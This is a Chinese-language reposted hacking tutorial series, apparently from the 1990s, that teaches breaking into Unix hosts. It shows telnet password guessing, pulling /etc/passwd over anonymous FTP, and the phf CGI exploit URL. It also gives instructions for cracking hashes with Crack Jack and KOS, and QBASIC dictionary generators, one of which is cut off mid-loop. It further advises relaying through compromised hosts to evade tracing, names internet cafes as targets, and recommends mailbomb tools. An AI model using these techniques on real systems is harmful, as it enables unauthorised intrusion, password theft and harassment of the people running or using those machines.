首页  编辑  

Hacker教程

Tags: /计算机文档/网络与安全/   Date Created:

Hi,All:

   俺前几天从TW的一个站台看到这篇文章,想和大家分享一下。

#4 破解之道

  1. 进入主机中

  2. 得到 /etc/passwd

  3. 得到系统帐号

  4. 得到最高权限

 

 How 1.

  进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)

  或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能

  同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进

  行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知

  道, 你知道吗?!

  底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入, 当然其

  中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了

  面子.... 一定要删掉这些不堪入目的东西嘛...

  示范进入主机的方法: (By CoolFire)

 

(首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack

 过的主机, 然後利用它来 Crack 别的主机,  才不会被别人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName

Password:

Last login: Mon Dec  2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net ... 当然是假的罗, 都已经经过修改了啦 !!

 没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名

 称, 请同学们要记得 !!)

Digital UNIX V1.2C  (Rev. 248); Mon Oct 31 21:23:02 CST 1996

Digital UNIX V1.2C Worksystem Software (Rev. 248)

Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......)

ms.hinet.net> telnet www.fuckyou.hinet.net   (Telnet 试试看....)

Trying 111.222.255.255...

Connected to cool.fuckyou.hinet.net.

Escape character is '^]'.

Password:

Login incorrect

(没关系, 再来 !!)

cool login: hinet

Password:

Login incorrect

cool login:

(都没猜对, 这边用的是 猜 的方法, 今天运气好像不好)

telnet> close

Connection closed.

(重来, 换个 Port 试试看 !!)

ms.hinet.net> telnet 111.222.255.255 80

Trying 111.222.255.255...

Connected to 111.222.255.255.

Escape character is '^]'.

Connection closed by foreign host.

(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!)

(换 FTP Port 试试)

ms.hinet.net> ftp 111.222.255.255

Connected to 111.222.255.255.

220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

Name (111.222.255.255:FakeName): anonymous

331 Guest login ok, send your complete e-mail address as password.

Password:

230-Welcome, archive user!  This is an experimental FTP server.  If have any

230-unusual problems, please report them via e-mail to root@cool.com

230-If you do have problems, please try using a dash (-) as the first character

230-of your password -- this will turn off the continuation messages that may

230-be confusing your ftp client.

230-

230 Guest login ok, access restrictions apply.

Remote system type is UNIX.

Using binary mode to transfer files.

(哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 !

不要留下足迹喔!!)

ftp> ls

200 PORT command successful.

150 Opening ASCII mode data connection for file list.

etc

pub

usr

bin

lib

incoming

welcome.msg

226 Transfer complete.

(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)

ftp> cd etc

250 CWD command successful.

ftp> get passwd         (抓回来 !!)

200 PORT command successful.

150 Opening BINARY mode data connection for passwd (566 bytes).

226 Transfer complete.

566 bytes received in 0.56 seconds (0.93 Kbytes/s)

(喔... 这麽容易吗??)

ftp> !cat passwd      (看看 !!!)

root::0:0:root:/root:/bin/bash

bin:*:1:1:bin:/bin:

daemon:*:2:2:daemon:/sbin:

adm:*:3:4:adm:/var/adm:

lp:*:4:7:lp:/var/spool/lpd:

sync:*:5:0:sync:/sbin:/bin/sync

shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown

halt:*:7:0:halt:/sbin:/sbin/halt

mail:*:8:12:mail:/var/spool/mail:

news:*:9:13:news:/var/spool/news:

uucp:*:10:14:uucp:/var/spool/uucp:

operator:*:11:0:operator:/root:/bin/bash

games:*:12:100:games:/usr/games:

man:*:13:15:man:/usr/man:

postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash

ftp:*:404:1::/home/ftp:/bin/bash

(哇哩... 是 Shadow 的... 真是出师不利.... )

ftp> bye

221 Goodbye.

(不信邪.... 还是老话, 要有恒心....)

(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net

Trying 111.222.255.255...

Connected to cool.fuckyou.hinet.net.

Escape character is '^]'.

Password:

Login incorrect

(又猜错 !!)

cool login: fuckyou

Password:

Last login: Mon Dec  2 09:20:07 from 205.11.122.12

Linux 1.2.13.

Some programming languages manage to absorb change but withstand

progress.

cool:~$

(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连

password 也是 system name.... 总算... 没白玩...)

cool:~$ system

bash: system: command not found

(嗯...  这个 user 的权限好像不大....)

cool:~$ ls

cool:~$ pwd

/home/fuckyou

cool:~$ cd /

cool:/$ ls

Public/      cdrom/       lib/         mnt/         tmp/         www/

README       dev/         linux*       proc/        usr/

bin/         etc/         local/       root/        var/

boot/        home/        lost+found/  sbin/        

cool:/$ cd etc

telnet> quit

(好想睡呀 !! 不玩了 !! 下节课再开始....)

Connection closed.

ms.hinet.net> exit

 How 2.

 

上节课抓回来一个 "乱七八糟" 的 /etc/passwd, 你以为我的真那麽笨吗?? guest 所

抓回来的能是甚麽好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已

经 "猜" 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧

!!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName

Password:

Last login: Mon Dec  2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C  (Rev. 248); Mon Oct 31 21:23:02 CST 1996

Digital UNIX V1.2C Worksystem Software (Rev. 248)

Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是.....呵...)

ms.hinet.net> telnet cool.fuckyou.hinet.net   (Telnet 试试看.... 昨天的位址,

有作笔记吧!)

stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net

Trying 111.222.255.255...

Connected to cool.fuckyou.hinet.net.

Escape character is '^]'.

Password:

Login incorrect

cool login: fuckyou

Password:             (一样输入 fuckyou)

Last login: Mon Dec  1 12:44:10 from ms.hinet.net

Linux 1.2.13.

cool:~$ cd /etc

cool:/etc$ ls

DIR_COLORS         ftpusers           localtime          resolv.conf

HOSTNAME           gateways           magic              rpc

.....

NETWORKING         group              mail.rc            securetty

(找寻目标..... 太乱了 ! 懒得找, 再来 ....)

cool:/etc$ ls pa*

passwd      passwd.OLD  passwd.old

(果然在)

cool:/etc$ more passwd

(看看有没有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash

john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正点 ! 一点都没有防备 !!)

cool:/etc$ exit

logout

(走了!.... 换 FTP 上场 !!)

Connection closed by foreign host.

ms.hinet.net> ftp www.fuckyou.hinet.net

Connected to cool.fuckyou.hinet.net.

220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.

Name (www.fuckyou.hinet.net:66126): fuckyou

331 Password required for fuckyou.

Password:

230 User fuckyou logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> cd /etc

250 CWD command successful.

ftp> get passwd

200 PORT command successful.

150 Opening BINARY mode data connection for passwd (350 bytes).

226 Transfer complete.

350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash

john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)

ftp> bye

221 Goodbye.

ms.hinet.net> exit

passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课

所看到的这个格式的 passwd 并不是真正的  passwd....

root::0:0:root:/root:/bin/bash

因为密码的部份没有东西.... 所以拿了也没有用 !! 但这一节课所拿到的东西呢,

像是这样, 有几点需要说明的, 就是它究竟代表著甚麽???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成几个栏位, 各栏位对照如下:

   User Name: john

    Password:234ab56

     User No: 9999

    Group No: 13

   Real Name: John Smith

    Home Dir: /home/john

       Shell: /bin/sh

了了吧 ! 了了吧 ! 保留著你千辛万苦所拿到的 passwd, 咱们第三节

课再来告诉各位如何使用 Crack Jack 把 passwd 解码.... 呵呵...

zzZZzZzz...

Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)

嗯... 该到第三课了 !! 累了的同学先去喝口水吧!

这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔,

不要告诉我你习惯用

Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4

的怀抱, 但请

先确定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page

中拿到这个版

本的 Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上 !

但还是要讲

讲它的缺点... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个 DOS Mode 跑,

它可是连

理都不会理你的 !

OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4

前所需要的东

西有这些 [1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix

系统中

的 /etc/ 目录中找到 passwd [3] 字典档 (哪里找, 自己敲... 呵 ClayMore 中有一份

DIC.TXT

是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听

James

说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!)....  使用 Crack Jack 1.4

前需先确

定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !!

开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name... 输入你的 passwd 档名,

Dictionary

Name 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT

中写入它所

找到的密码 !! 但... 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你

This is

JackAss... 嗯...说脏话了 !! 因为使用 Jack 占用的时间实在太多,

如果你中途想要停掉时只要

按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能,

中断时会自动存档

为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 !!

当然你也可以为

你的 Restore 重新命名 ! Jack 也会找得到的 ... 如 Ren restore restore.HNT

之後要再寻找

的时後就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore

前次所寻找的字串...

继续帮你找下去....

字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程式, 有些里面会附,

或是找找其它

的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来,

可能要有

一点资料栏位及写程式的基础.

[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack

好正点呀 !!!

所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧

!!

最近比较没空了 ! 因为要赶其它的报告, Home Page 也没有太多时间整理,

更别说是写这些说明了,

但是太多网友需要, 我只好两肋插刀... 差点昨天就交不出报告了 !!

如果你有兴趣写其它程式的中

文说明, 请完成後寄一份给我, 我将它放在 Home Page 上面让其它人参考,

当然你也可以给我你的

使用心得, 让别人参考看看也行! 另外 CoolFire 目前准备收集一系列的 System Hole

List, 如果

你在其它的站台有看到的, 请把它先 Cut 下来, Mail 一份给我 !

这样我才能弄出一份更齐全的东

西呀.... 还有... 在想弄个 Mail List... 唉.. 不想这麽多了! 有空再说吧!

CoolFire 在 hotmail 的 ID 被别人抢先一步, 所以我的 ID 就变成 CoolFires 了 !!

真是 XO...

话说上次 CoolFire 讲到许多的 Net Coffee 店, 安全性之差实在是没话说,

但是过了这麽久也不

见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像

CoolFire

这样温和, 如果遇到的是比较狠一点的角色, 那你的 Net Coffee 可能要有一两天只卖

Coffee 而

没办法再 Net 下去了!!

继 CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢 ?? 这次咱们不谈新的花招,

用用之前所讲

的再来探险一番, 当然, 这一次我照往例还是不会使用真正的 Domain Name  来作教学,

但是课程

中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....

**谈一下 Crack Jack 猜猜密码

 许多人从上一次介绍 Crack Jack 之後就应该已经领教过它的功力了,

但是有几点需要说明的,

 有些人使用 Jack 来帮你寻找 password, 我就当你已经抓到了没有 shadow 的

/etc/passwd,

 但是为甚麽使用 Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为

Jack 还

 是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,

那当然连一个小小帐号

 的密码你都别想猜到了. 数一下你所使用的字典档中有多少字 ???

我用的字典档有十九万多个

 字, 你的呢? 是不是小巫见大巫呀 ?? 那麽就赶快充实一下字典档再重新寻找吧 !!

 许多人的密码都有一定的法则, 我自己写了 PaSs2DiC 就是将 UserName 由

passwd档转成字典档

 的工具, 这是对一些喜欢使用 UserName 当作 Password 的人最好的方式,

但是也曾经好运的找到

 别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的 ID 作为密码的 ???

你可以很简单的使用

 Qbasic 来制作 "序数" 密码, 或日期密码, 底下简单的作一个 0101 (一月一日) 到

1231 的密码

 档出来:

------------Cut Here MakeDate.BAS -------------------

          Open "Dates" for output as #1

          for I=1 to 12

          for J=1 to 31

              I1$=rtrim$(ltrim$str$(I)))

              J1$=rtrim$(ltrim$str$(J)))

              if len(I1$)=1 then I1$="0"+I1$

              if len(J1$)=1 then J1$="0"+J1$

              Out$=I1$+J1$

              print #1,Out$  

          next I

          next J

          close

------------ Cut Here End MakeDate.BAS ----------------

 这支小程式将会写一个 "DATES" 的档案, 里面就是你要的字典, 当然啦,

这只是包含月跟日 !!

 如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再 Run 一次试试看了,

不过这是一

 个好的开始不是吗 ??

**如何保护自己的密码

 谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,

请遵守以下的原则: [1]不

 用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大)

[3]不用身份证字号

 作为密码(LetMeIn! 里有猜身份证字号的功能耶)

[4]不用在字典中查得到的字作为密码.

 

 那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:

用一句有意

 义的话来作为自己的密码, 例如: NoOneCanCrackIt 就是一个很难猜的密码类型,

基於这个密码猜

 法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调 ?? 如果你的密码是

coolfire,

 建议你最好能改成 CoolFire 或 coolfires (加复数 "s"),

这样被猜中的机率就小了很多. 如果

 你是一个 Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@

**正式的话题

 

 这次的话题当然还是 Crack, 相信许多人已经看过 CoolHC#1 了,

当然眼尖的人可能也已经 D/L

 System Holes 试过了, 你有成功的例子吗 ?? 如果没有, 这份 CoolHC#2

可能就是你的强心针,

 因为这次谈的正是 System Holes #1 成功的案例.

 Step 1. 连线到 "蕃薯藤" 找 "网路咖啡" 找到好多家网路咖啡的 WWW 网址,

一一连上去试试看

         在 System Holes #1 中的方法可不可行.

 Step 2. 若可行则会传回 /etc/passwd 资讯, 存档後迅速 Logout, 使用 Crack Jack

解读!!

 [[实例探讨]]

 

 System Holes #1 中所介绍的 WWW 入侵法是这样子的:

          http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再

          http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

  [1] 用 WWW Browser 连到 yournet.net

  [2] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"

  [3] 接著如果出来一份像 Report 的画面的话, 接著输入

/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd

  [4] 发生了甚麽事?? etc/passwd 在你的浏览器中 "显示" 出来了 !! 快点 Save 吧

!!

 这个方法所用的是系统 "检索" 的漏洞, 不提供这个功能,

或是伺服器检索类型不同的机器则不

 会接受这样的指令, 当然也就逃过我们这次的模拟演练啦 !! 但是.... 相信我,

你一定会找到一

 家脱线的网路咖啡, 并没有像我们一样每天阅读 Mail List 的信,

对系统安全一点研究也没有的

 人不在少数. http://hacker.welcome.com 就是这样的一个 Net Coffee Shop...

呵.... 快来试

 试吧 !!

 当 CoolFire 抓到 /etc/passwd 後, 立刻存档, 也马上断线, 并且拿出 UltraEdit

来瞧一下使用

 者的资讯, 当然这个小 passwd 对 Crack Jack 来说, 实在是不够看,

没几分钟就在我的 486 机

 器上显示出来几个以 UserName 作为 Password 的资讯 (归功於 PaSs2DiC 及

CrackJack 的功劳)

 不过当我试著找寻 root 的密码时, 一想到我那将近 20 万字的字典档,

就想到可能花费的时间一

 定相当的惊人, 於是就以 Jack 的 Option 设定只寻找 root 那一行, ...

(过了良久)... 果不然

 又是一个笨 root. 用了 "非常" 容易猜的密码... <--- This is JackAss... 呵!! Got

It!

 如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用 Crack Jack,

不然你也可

 以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是

486DX4-130

 32MB RAM, 3.2GB HDD, 近 20 万字的字典档, 如果在分析较大的 passwd

档时我会将字典档切割

 为四至五个小档 (看有多少台机器可跑),

然後在周末下班前在公司的几台机器上分别执行 Crack

 Jack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd

档又很大的话,

 由於 Crack Jack 无法於 Windoz 95 下使用, 你可能只能牺升时间或机器来跑了!

再没有办法的

 话, 亦可使用单机多工, 多开几个 DOS Box 来跑 Brute, 也许也是一个可行的办法!

**後语

 有许多人在使用 Crack Jack 的时候有许多问题, 不过看了 CoolHC#1 应该都解决了吧

?? 最近大

 家问的比较多的是 UpYours 3.0, 虽然已经改进了 Install 的问题,

不过大家的问题还是都出在

 Winsck.ocx 上面, 有人说装了 MSICP Beta 会好 ?? 但也有实例装了也还不能 Run 的,

在此建议

 大家不要再玩 MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,

已经证实有许多常用

 的 MailBomb 没有办法 Fake IP 了 !! 所以... 如果 UpYours 3.0

装不起来的人就试试 KaBoom!

 V3.0 吧 ! 虽然没有办法 Fake IP (选错 Mail Server 的话), 但是也是一个不错的

AnonyMailer

 如果要发匿名信, 现在首页上有可以帮你发信的 Mailer, 会安全一点.

 如果你仍旧对 UpYours 3.0 不死心, 就试试 ResSvr32.exe (Under Windows/system

directory),

 看看能不能将 WinSck.ocx 装上了...  记得先 UnReg 再 Reg...

 在此建议大家可以多订阅一些 "系统安全" 讨论的 Mail List

或多参考一些已经被找出来的系统

 漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,

如果能够多

 参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,

放在手边

 参考的话, 就可以快速的; 安全的入侵了!! 下一次所谈的是 SendMail 的 Bug 实例,

在这中间

 当然照往例会先出一份 System Holes #2 来作为资料. 如果有兴趣的人在 SH#2

出来的时候可以

 先研究看看. 下次见! Merry X'Mas..... & Happy New Year.......

 

------

上次讲的 Home Page 建置案还没搞完, 没有充实一下 Home Page 实在是对不起大家,

所以利用一点

时间写了 CoolHC#2, 可能报告又交不出来了 !! 老话,

如果你有兴趣写其它程式的中文说明, 请完

成後寄一份给我, 我将它放在 Home Page 上面让其它人参考,

当然你也可以给我你的使用心得, 让

别人参考看看也行! 目前准备收集一系列的 System Hole List,

如果你在其它的站台有看到的, 请

把它先 Cut 下来, Mail 一份给我 !

经过了上一次的实战, 该 ISP 已经灰头土脸, 当然也已经将被我揪出密码的 User

Password 改掉

了, 但是系统安全部分还是没有多大的改进, 唉.... 有点伤心.

这一次的内容主要在加强上次所

说明的字典档部分, 因为我又想到另外一个方法可以快速的产生字典档,

而且用这个方法产生的字

典档更吓人; 当然还要跟大家介绍另一个好用的 Password Crack 工具,

并加上最近的一些信件整

理出来的 FAQ 等, 希望能在过年以前就将这一篇写好!

本次主题: 字典档的维护及更新

连接位址: 无

特别说明: 快点加强一下你的字典档吧 !! 不然怎麽破密码哩?!

依我看, "字典" 这个讨论应该是谈不完的了, 因为有太多的方法了,

但是为了维护你自身的权益, 自

己的密码最好保管好, 我在前几天刚拿到 KOS 的时候, 拿她来跑一个 ISP 的

/etc/passwd 档案, 原

先单单使用 Crack Jack 只找到 22 组的密码, 用了 KOS 加上 Crack Jack 居然共找到了

88 组的密

码, 还好该 ISP 不像 高-NET 一样是属於 "时数收费" 的收费方式, 不然可能有许多的

User 自己当

了冤大头都还浑然不知. 所以这个讨论还是免不了的, 如果你觉得你不需要这些知识,

请跳过去吧!!

上次的字典档讨论, 我写了一个简短的程式出来产生了 3120 组的密码,

但是这些密码并不一定是一

个 "字", 也就是说产生完全合乎我们所限定的 "法则", 但却不一定是一个已存在的字,

所以如果要

产生一个 "高效率" 的字典档, 使用上次所说的那种方式就不是一个很好的方法了.

以上次所写的程

式 MAKEDIC.BAS 所产生的 MyDic.txt 为例, 其中的 braard clale cleoe dgeiing

dgeie.......等

字就不是很 "正常" 的字, 当然也有可能是某人的密码, 但其机率小之又小.

这次所写的程式名称为 TXT2DIC.BAS, 我们还是先使用大家都熟悉的 QBASIC 来写,

以方便日後的修

改, 先说明一下原理: 这个程式是一个自动产生字典档的程式, 我们是经由给程式一个

"文字档", 然

後由程式自该文字档中 "抽取出" 字出来, 这些文字档必需是英文的文字档,

如果使用中文的文字档

的话程式跑起来会有问题, 英文文字档的取得可由英文版软体的 Readme

档或网路上的英文版学术论

文或其它的来源.

当然有可能在文件中会出现像 www.showtower.com.tw/~fetag 的字眼,

我们总不能把它也列入字典档

中吧! 所以程式中有一点小小的设计, 就是该字若字母数大於 10 则不列入考虑,

我们也可以使用上

一次所介绍的子音+母音... 等的公式来作检查法, 但是我没有太多的时间作这些事,

留待有空的人来

写吧!!

底下就是该程式原始码, 请各位以 QBASIC 来启动并执行它:

--------------- Txt2Dic.BAS Start Here

-------------------------------------------------------------------------------

--------

CLS

PRINT "Txt2Dic Version 0.1B  (C)1997 By CoolFire     ReChange: CoolFire"

PRINT "[Source Released, For Changer, Add Your Name in ReChange Field]"

PRINT

LINE INPUT "Text File Name: "; TxtFile$

LINE INPUT "Output Dic Name: "; DicFile$

OPEN TxtFile$ FOR INPUT AS #1

OPEN "TMPFILE1.$$$" FOR OUTPUT AS #2

REM Filter for text file

ReInput:

IF EOF(1) THEN GOTO EndFile

LINE INPUT #1, L$

ReTry:

  L$ = LTRIM$(L$)

  L$ = RTRIM$(L$)

  TmpValue = INSTR(L$, " ")

  IF TmpValue <> 0 THEN

     DicTxt$ = LEFT$(L$, TmpValue - 1)

     PRINT #2, DicTxt$

     LOCATE 7, 1: PRINT "Step 1, Add word : "; DicTxt$; STRING$(10, " ")

     L$ = RIGHT$(L$, LEN(L$) - TmpValue)

     GOTO ReTry

  ELSE

     GOTO ReInput

  END IF

END

EndFile:

CLOSE

REM Filter for special chapter and lower-case the word

OPEN "TMPFILE1.$$$" FOR INPUT AS #1

OPEN DicFile$ FOR OUTPUT AS #2

Special$ = "-,.:<>?*()/_" + CHR$(34)

DO

LINE INPUT #1, L$

FOR I = 1 TO 13

   SP$ = MID$(Special$, I, 1)

   TmpValue = INSTR(L$, SP$)

   IF TmpValue <> 0 THEN

      LOCATE 8, 1: PRINT "Remode special word :"; L$; STRING$(10, " ")

      L$ = ""

   END IF

NEXT I

IF L$ <> "" THEN

   L$ = LCASE$(L$)

   PRINT #2, L$

END IF

LOOP UNTIL EOF(1)

CLOSE

KILL "TMPFILE1.$$$"

END

--------------- Cut Here, End of Txt2Dic.BAS

我只花了几分钟写这个程式, 因为时间紧迫 (为了在过年前将此篇送出),

所以有些考虑到的地方都没

有作修改, 在这里再作些说明: 这个程式的第一个部份为分解字串, 将碰到的 CHR$(20)

也就是空白

分离出来, 这是分解一句话中字与字最简单的方法,

并且会将分解出来的字存在一个暂存档中, 作为

第二部分的使用. 第二部分将暂存档读入, 并过滤非正常的字母出现,

我只让它过滤了十三种特殊字

如: -,.:<>?*()/_" 等, 当然如果你可视需要再作删减的功能.

原本想要再写排序及过滤重覆字的功能, 但是这些功能不是那麽需要,

因为在排序方面你可以使用电

脑中 DOS 的 SORT 或 Crack Jack 的 JSort, 过滤重覆字也有 CoolFire 的 De-Sort

可以使用, 所

以就先在这里停住, 有心的读者可以自行修改, 修改完後也请传送一份给我,

作为日後教学的参考之

用, 或提供网友们分享.

仔细看一看这个程式还是有很多地方没有作修正, 或是没有作 Error Handle 等,

但已经给各位原始

程式了, 大家就试著修改看看吧! Qbaisc 是一个很简单的语言,

只要你试试看就可以把这个程式改得

很好了. 用这个程式试了一个文字档, 发现它找到的字都是一些很简单的字,

当然跟你所给它的材料

有很大的关系, 使用这个程式配合一个很棒的材料档, 应该可以作出一份很棒的字典档,

希望大家可

以好好的利用它.

**** 新工具程式 Global KOS Krack (KOS) ****

记得从上次讲过 Crack Jack 之後好像就没有再讲过 Password Crack 的工具程式了,

当然也跟最近

没有甚麽好程式出现有关系, 像前一阵子风行的 Mail Bomb 最近也没有再见到改版,

倒是出现了一

些写得不怎麽样的 Bomb 程式, 了无新意, 我现在还是在用 KaBoom 3.0, 你呢 ??

前几天无聊逛了

一下国外的 Crack 站台, 意外的发现了一个叫作 KOS 的东西, 传回来试了一试果然不错,

而且里面

还包含了一个 3MB 多的字典档, 这对字典档中缺料的读者们肯定会有帮助的.

KOS 是许多工具的集合, 由一些批次档对这些工具作了很棒的整合, 它必须与 Crack Jack

一起使用

才能运作, 平常我们在处里 Password Crack 时都需要考虑到第一个字母大写, 加数字,

字母大小写

转换等等的工作, 都可以由 KOS 一手包办, 你只要取得 KOS, 就可以配合著 Crack Jack

将以前单单

使用 Jack 寻找的 /etc/passwd 再翻出来 Crack 看看, 保证你会体会到拥有 KOS

的好处.

像前面所说的, 我将以前只找到 22 组密码的 /etc/passwd 重新跑过, KOS

居然可以帮助我找出 88

组的密码, 足可见 KOS 可以增强 Crack Jack 四倍的 Cracking 能力, 作者宣称 KOS 在

NT 上开了

DOS 视窗就可以跑, 但是我以 NT 4.0 中文版及 Windows 95 (97 年版) 测试後还是因为

Jack 无法

在上面运作而停摆, 只好回到纯 DOS 模式下才能够使用, 但是 KOS

还是能发挥它强大的功能, 唯一

需要的就是一部速度快一点的机器, 当然还有时间也是必需的.

我使用 KOS + Crack Jack 在 Pentium-100 32MB RAM SCSI-II HDD 上跑一个

/etc/passwd 档加上我

的字典档 (passwd 档案大小为 197K, 字典档大小为 5.1MB),

跑了四天都还没有完全跑完的情况, 就

可以知道 KOS 尽了多大的努力在帮我们找出密码, 当然如果你的 /etc/passwd 只有几 K

大小可能只

消几个小时就可以全部跑完了!! 不过要找出 root 密码, 可能还是要靠点运气才行了....

KOS 的压缩档中还包含了 SHADOW.C 及 UNSHADOW.C 两个解 shadow 的程式, 可在 Unix

主机上编译

以取得被 shadow 过的 /etc/passwd, 在这里也顺便提出,

网友们不要忘了顺便试试这两支程式.

   想要知道哪里可以拿到 Global KOS Krack ?? 到我们的 Home Page 看看吧!!

[Q6]Hinet 密码 to Dic: 因为 Hinet 的密码格式是 1abcdefg 所以我就依照 coolhc-3

的程

   式设计了这个东西!  希望会有用! 欢迎批评,指教,修改.

----- HinetPas.BAS Start Here----

DIM No$(10)

DIM Eng$(26)

DIM LastWord$(26)

DIM a$(26)

DIM b$(26)

DIM c$(26)

DIM d$(26)

DIM e$(26)

DATA "0", "1", "2", "3", "4", "5", "6", "7", "8", "9"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

DATA "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o",

"p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"

FOR I = 1 TO 10

READ No$(I)

PRINT No$(I)

NEXT I

FOR I = 1 TO 26

 READ Eng$(I)

NEXT I

 

FOR I = 1 TO 26

 READ LastWord$(I)

   NEXT I

 FOR I = 1 TO 26

   READ a$(I)

 NEXT I

 FOR I = 1 TO 26

   READ b$(I)

 NEXT I

           FOR I = 1 TO 26

             READ c$(I)

             NEXT I

             FOR I = 1 TO 26

               READ d$(I)

               NEXT I

             

               FOR I = 1 TO 26

                 READ e$(I)

                 NEXT I

                 OPEN "Hinetpas.txt" FOR OUTPUT AS #1

                 FOR I = 1 TO 10

                 FOR J = 1 TO 26

                 FOR k = 1 TO 26

                 FOR l = 1 TO 26

                 FOR m = 1 TO 26

                 FOR n = 1 TO 26

                 FOR o = 1 TO 26

